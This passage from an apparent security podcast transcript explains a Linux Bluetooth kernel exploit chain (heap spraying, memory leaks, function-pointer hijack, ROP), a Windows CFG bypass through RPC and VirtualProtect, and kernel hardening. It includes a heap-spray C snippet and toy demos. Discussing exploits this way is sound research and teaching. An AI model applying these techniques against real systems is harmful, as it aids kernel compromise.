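    if (qid < 0) { perror("msgget"); return 1; }

    struct spray_msg m = { .mtype = 1 };
    memset(m.mtext, 'A', sizeof(m.mtext));   /* controlled spray contents */

    for (int i = 0; i < SPRAY_COUNT; i++) {
        if (msgsnd(qid, &m, sizeof(m.mtext), 0) < 0) {
            perror("msgsnd");
            break;
        }
    }

    /* Receiving (or deleting the queue) frees the objects again, which is
     * how you would punch holes for an allocated/free/allocated pattern. */
    msgctl(qid, IPC_RMID, NULL);
    return 0;
}
```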
So basically he's aiming to get into that kmalloc-128, and not kmalloc-64, nothing lower, nothing higher. And he ends up finding the Get AMP Assoc Response handler. I have no idea what that's for functionally, but what it does is duplicate a string in memory; if I find the code here, it uses kmemdup to duplicate it. So that basically becomes the primitive that gets used here for any of the heap allocations: you're able to control the size that gets copied and the actual data that gets copied into it. The only thing is you can't control the free, and if you're wanting to use this for heap grooming, you're going to want some control over that free, to create holes where you want them. Interestingly, the same thing kind of leaks memory, because it will free this assoc value, or sorry, it'll free that when the channel closes, but every time you call this thing, every time it looks it up, it just overwrites that pointer. So if you call it twice, what you end up having is it overwrites that pointer, so when it frees it, it only frees one of them. So by calling this thing twice and then closing, and doing that a bunch of times, you're able to heap spray in a pattern of allocated, free, allocated, free, allocated, free, which is exactly what you need for abusing BadKarma, where it's going to try to access beyond the edge of the actual pointer you provide it, or at least beyond where it should be. So with that, they're able to get control of the memory that is one block away from that AMP manager, so you're able to get control of the sk_filter. This is a long post, I can't find the code to pull it up, but you're able to get control of that dereference. At that point you control what's there, and that's where leaking memory comes in: you need to know some pointers. He got, I'm going to say, kind of lucky: using BadChoice he was able to actually leak the pointer to the channel object itself, and that basically ends up being in kmalloc-1024. And I'm just saying to chat: we've had a few people asking about PS4 exploits, we have no update on that, and asking isn't going to help. So, coming back on topic here: with BadChoice you're able to leak memory. I won't go into all the details, but by making one call and then the next call, he was able to control the stack contents, so it exposes the value that was useful, specifically the L2CAP channel object. So, putting everything together now: you're able to control that dereference, and the dereference itself actually gets a little bit more complicated. Let me see if I can find the right code for it.
Specter
Is it because of the RCU aspect, or is it just the way that the pointer is
zi
used? Oh, the reason it gets a little bit more complicated is just because you've got several dereferences. I just found it here: the sk_filter, you control that dereference; then you need to control how it does the prog dereference; and then finally the actual function call dereference, or the function pointer dereference. So it's just a little bit more complicated because you've got the three layers of
Specter
indirection. So you fake the filter pointer and then set up a fake object to get the, yeah, function pointer hijacked. Okay, that makes
zi
sense. Yeah, and it helps because he has that kmalloc-1024 block that he can control, and that's from BadChoice either way. So you're able to control that, use that RIP control to get to a stack pivot that points at that 1024-size buffer, and then it was just a ROP chain to run a command, which was pretty much the same technique we saw in, like, he has a link to it, we've talked about it, CVE-2019-18683, which was another post, actually from Alexander Popov, which I believe we would have covered early last year. So that leads to the ROP chain, and we covered that technique, I guess, in episode 25, in a very kind of roundabout way. It's a detailed blog post; I am definitely not doing it justice trying to explain everything here briefly. Or not so
Specter
briefly. One thing I'm just trying to check really quickly: do you know if the fake object, like the fake filter, is kept in user space, or does he spray it in kernel
zi
space? Kernel space. That's where that heap allocation primitive that I
Specter
mentioned comes in. Right, no problem with that, I just wanted to be sure. I felt that was the case, but I wanted to verify, and the reason I bring it up is because, like I mentioned with the last issue, if this were faked in user space, which technically you could do, you would have an issue with supervisor mode access prevention. With the way he does it here, spraying it into the kernel, again it's getting around those mitigations, SMAP and SMEP. So yeah, it's cool to see that we have back-to-back posts that both handle that mitigation. So
zi
I guess one other thing I'll call out. Actually, I guess it doesn't really matter, but now that I've teased it: he did have to use a fragmented packet at one point, just due to the MTU size. But you can get more details by actually reading it, I
Specter
guess. Yeah, like you said, it's a very long post and there's a lot of good information in there. It's just hard to cover on the podcast, because we'd be here for
zi
hours. Yeah, it's a good post. I would absolutely recommend giving it a read; it covers a lot of details that are interesting, and there's not a lot of fluff.
Specter
And it's a good insight into what's involved in modern kernel exploitation. You get that question quite a bit: okay, what does modern kernel exploitation look like? A lot of the resources out there are for older exploits from like 2014 or 2016 or whatever, and the landscape has definitely changed since then, so these types of write-ups are a bit rare, but they give needed insight into what's involved in modern kernel exploitation. So if you're looking to get into that kind of stuff, this is the post you should read for sure, and TheFlow is a really good writer. Like zi said, not a lot of fluff or anything there; it's all relevant and good information. So we'll move on to our last exploit topic and finish off with a new CFG bypass technique in Windows using remote procedure calls, or RPC, that was discovered when analyzing an Internet Explorer vulnerability. The post goes into some details on the vulnerability, which is a use-after-free in JavaScript attribute objects, where the valueOf callback can get abused by an attacker to clear the attributes, which is unaccounted for when the callback returns. Now, what CFG does is try to make it so that you can't hijack indirect calls as an attacker, from something like a vtable, to get code execution, even if you have a use-after-free. The way it does that is it stores a bitmap of functions which are valid to be jumped to, and it does call target validation to ensure, okay, where you're trying to go, is that actually somewhere we've marked as safe to jump to? If not, crash or whatever, or just don't do it; I think crashing is the common side effect there. But yeah, it's basically in place to prevent hijacking of the control flow, as the name implies, Control Flow Guard. What they managed to do, though, was abuse Windows RPC to get a call gadget that allows them to call any function with any parameters, as long as the function is in that valid bitmap. Then, by using that, you can call VirtualProtect, which is in the bitmap, to make the memory holding the guard check function pointer writable, and then you can replace the pointer that tries to validate the call target with something that just returns, which is basically patching out the call target validation. You can then flip the protection back afterwards, again doing the same trick, and CFG is no longer an issue; you basically just knock it out. So yeah, that's what you get when you deal
zi
with mitigations by just turning them off on the fly.
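A toy model of why coarse-grained checking is bypassable this way; this is a simplification, not Microsoft's actual CFG implementation. There is effectively one process-wide "is this a valid call target" set, so an attacker who gains an arbitrary "call any valid function with my arguments" gadget, like the RPC one here, can simply call a legitimately valid but dangerous function such as VirtualProtect.

```c
#include <stdio.h>
#include <stdlib.h>

/* Toy model of a coarse-grained indirect-call check: one global set of
 * "valid targets", with no notion of which call sites may reach which
 * target. Not Microsoft's implementation, just the shape of the policy. */
typedef void (*fn_t)(long arg);

static fn_t valid_targets[16];
static int  n_valid;

static void register_valid(fn_t f) { valid_targets[n_valid++] = f; }

static void guard_check_icall(fn_t target)
{
    for (int i = 0; i < n_valid; i++)
        if (valid_targets[i] == target)
            return;              /* any registered function passes */
    abort();                     /* invalid target: fast-fail, like CFG */
}

/* Two legitimate functions; both are "valid" in the same global sense. */
static void print_number(long n)
{
    printf("number: %ld\n", n);
}

static void make_writable(long addr)
{
    /* Stand-in for something like VirtualProtect: dangerous, but valid. */
    printf("pretend VirtualProtect at 0x%lx\n", (unsigned long)addr);
}

/* Models the RPC gadget: the attacker picks both the target and the
 * argument, and the check still passes because the target is *a* valid
 * function, just not one this call site was ever meant to reach. */
static void attacker_call(fn_t target, long arg)
{
    guard_check_icall(target);
    target(arg);
}

int main(void)
{
    register_valid(print_number);
    register_valid(make_writable);

    attacker_call(print_number, 42);           /* intended use */
    attacker_call(make_writable, 0x7ff01000L); /* also passes the check */
    return 0;
}
```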
Specter
Yeah, it's pretty funny: all that work, and it's just turned off like an on-off switch. But yeah, it's basically just abusing the fact that you can use RPC to call valid functions, but in a way that Microsoft didn't really expect, right? Calling VirtualProtect in order to patch the memory and remove their mitigation. And this is one of those things where software mitigations are kind of weaker; if this was a hardware mitigation, this wouldn't fly, but because CFG is software, that's where it's kind of weak to these kinds of attacks, right?
zi
I will also mention: 0xABC0 points out that this is not new. I mean, I was kind of reading this feeling like I'm surprised we hadn't seen it before; nonetheless, it's a good write-up of a CFG technique. But yeah, it does look like it's not new. There is mxatone's, I'm not sure how to say that, which has a mitigation for it; I'll actually include that here in the description. But yeah, so it looks like it is a known technique. Nonetheless, it's still an interesting write-up. I guess it's not from the last week, so maybe we'll just have to cut this section instead.
Specter
Oh, I mean, I still think it's cool to bring up, and I was kind of thinking the same thing when I was reading it. Not to downplay the issue, but this is something where the technique almost seems too simple for it not to have been known by other people, as far as that kind of technique goes.
zi
No, I mean, when it comes down to it, Control Flow Guard in this case is software-based and very, very wide. It just allows you to call any function as long as it's a valid function; that's the only criterion. It doesn't do any sort of checking to make sure, like, this area of code should be able to call that function, or needs to call that function. And because of that, there are definitely a lot of techniques for getting around CFG. A good, clear write-up, though, nonetheless. And I mean, I wasn't familiar with this myself, though I also don't do much on the Windows side.
Specter
Yeah, basically what I'd say there, like, what you said kind of sparked something in me: it's one of those things where coarse-grained checking is just always going to let you down, right? If you had fine-grained checking, not just one bitmap of what's valid but bitmaps specific to each area, of what's valid for that area, that would have protected against this type of attack. But where it's so coarse-grained that it's just one big bitmap of what you're allowed to call, yeah, there are a lot of different potential little tricks you can use to get around it. And that's just one of them.
zi
All right, so we'll move into our last topic of the
Specter
show, which is a research topic. It's basically "security things": it's another Kees Cook post, on Linux 5.9 this time. There are a few things in it we can talk about, one of which kills off an entire class of vulnerabilities. One of the things introduced was Clang's automatic zero-initialization of all stack variables. So yeah, rest in peace, stack-based info leaks, like the ones we've covered on this show, like TheFlow's issue where there was a struct leaked off the stack and you used that to chain with your exploit. That would not fly with this mitigation, because all of those fields would be initialized to zero; there wouldn't be any uninitialized kernel memory to leak. So yeah, we'll have to see if it
zi
actually ends up getting used, yeah.
Specter
Yeah, that is the thing: some of the things in these security posts are not on by default, you kind of have to turn them on, which most people don't do, because...
zi
Still interesting to kind of talk about what's coming down the pipeline, though.
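As a quick userspace illustration of the bug class being killed off (this is not kernel code): an uninitialized struct copied out in full leaks whatever happened to be in that stack slot, and building with Clang's -ftrivial-auto-var-init=zero, which is what the kernel exposes as CONFIG_INIT_STACK_ALL_ZERO as far as I understand it, makes those bytes come out as zeros instead.

```c
#include <stdio.h>
#include <string.h>

/* A response struct where only some fields are ever written. */
struct reply {
    int  id;
    int  status;
    char scratch[24];   /* never initialized by the handler below */
};

/* Leave recognizable bytes on the stack so any leak is easier to spot;
 * whether they actually overlap the struct below depends on the compiler
 * and stack layout, so treat the output as illustrative only. */
static void pollute_stack(void)
{
    volatile char junk[64];
    for (size_t i = 0; i < sizeof(junk); i++)
        junk[i] = 0x41;
}

/* Copies the whole struct out, including the uninitialized bytes: the same
 * shape as the stack-based info leaks discussed above. Building with
 * -ftrivial-auto-var-init=zero makes the compiler zero 'r' up front. */
static void handle_request(int id, unsigned char *out, size_t out_len)
{
    struct reply r;
    r.id = id;
    r.status = 0;
    memcpy(out, &r, out_len < sizeof(r) ? out_len : sizeof(r));
}

int main(void)
{
    unsigned char out[sizeof(struct reply)];

    pollute_stack();
    handle_request(7, out, sizeof(out));

    for (size_t i = 0; i < sizeof(out); i++)
        printf("%02x ", out[i]);
    printf("\n");
    return 0;
}
```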
Specter
For sure. The other thing that was interesting here, too, was the hardening of the freelist on the slab allocators against double frees and cross-cache freeing. SLUB has had this for a while (it's not on by default), but SLAB hasn't had that option. So while the SLAB allocator isn't used as much, it's still a good step to have it there if people want to turn it on. This is another one of those options where it's not on by default; it's just kind of there if you want a hardened build, I guess, which some people absolutely do. But a lot of people don't go through the process of changing configuration options when building the Linux kernel, because there are so many of them and you have to know they exist. You're not just going to stumble upon it looking through, you know, Kconfig and go, oh hey, this one out of the three hundred thousand things that are here is the one. That's
zi
cool. I mean, you don't read through the dialog when you set up a new config, or even just do oldconfig, and go through absolutely every option? No,
Specter
yeah, defaults are fun. But yeah, I mean, it's good that it's there, the option is there. I think the most notable thing here is that zero-initializing thing with Clang. I think this is a little bit different from another mitigation that zi was kind of criticizing; we don't have a talk-about topic around it on the podcast, but there is another thing that was recently introduced, in Clang 11 I think, where they added being able to zero register values after a function finishes, like before it returns, and your performance on a kernel built with that would tank, it would be terrible. I think this is different: this is basically just initializing stack variables, not zeroing all the registers. So yeah, it's going to be an effective mitigation, because there are a lot of stack-based info leaks out there in the kernel, so it's a class of attacks that makes sense to kill from a developer standpoint. There is some other stuff in here as well, such as a new capability and some stack protector support for RISC-V, which, I mean, RISC-V, who's using that? The most notable ones are the cross-cache freeing and double-free protection on SLAB and the zero-initialization. So yeah, just like you said, one of those things to look out for coming down the pipeline. That said, that will conclude our topics for the stream. I think somebody in chat just... yeah, they posted the commits that added what I was talking about, so maybe we can bring it up on stream quickly since we have that. But yeah, they basically added it so it puts in instructions to zero all the registers. This would absolutely mess with things like instruction caching, and it wouldn't even really be that effective, because it might kill some ROP situations, but it won't kill all of them and it won't kill JOP. So you're losing a lot of performance for not a lot of gain, really. But yeah, it's kind of funny to see. I don't know why Clang decided to invest time in that... oh, actually, this is GCC, sorry. So does GCC do the same thing as well, the zeroing of the scratch registers? Okay. Yeah.
zi
I don't know... I don't know why, but Clang did add it, as he said, with Clang 11. Dude, I don't know
Specter
why. Like, this is kind of a waste of time in my opinion, but hey, it gives a good laugh. Anyway, that'll wrap up our topics for the show. Thank you to everyone who tuned in; you can catch the VODs on Twitch or on YouTube, as well as
zi
Anchor. Sorry, did I just kind of jump in on you? I guess, reading the tweet from Kees Cook, it actually mentions GCC; it's mentioned as being in GCC 11. So if it's in Clang, I'm not sure what version; I may be mistaken, maybe saying eleven was the wrong way to go.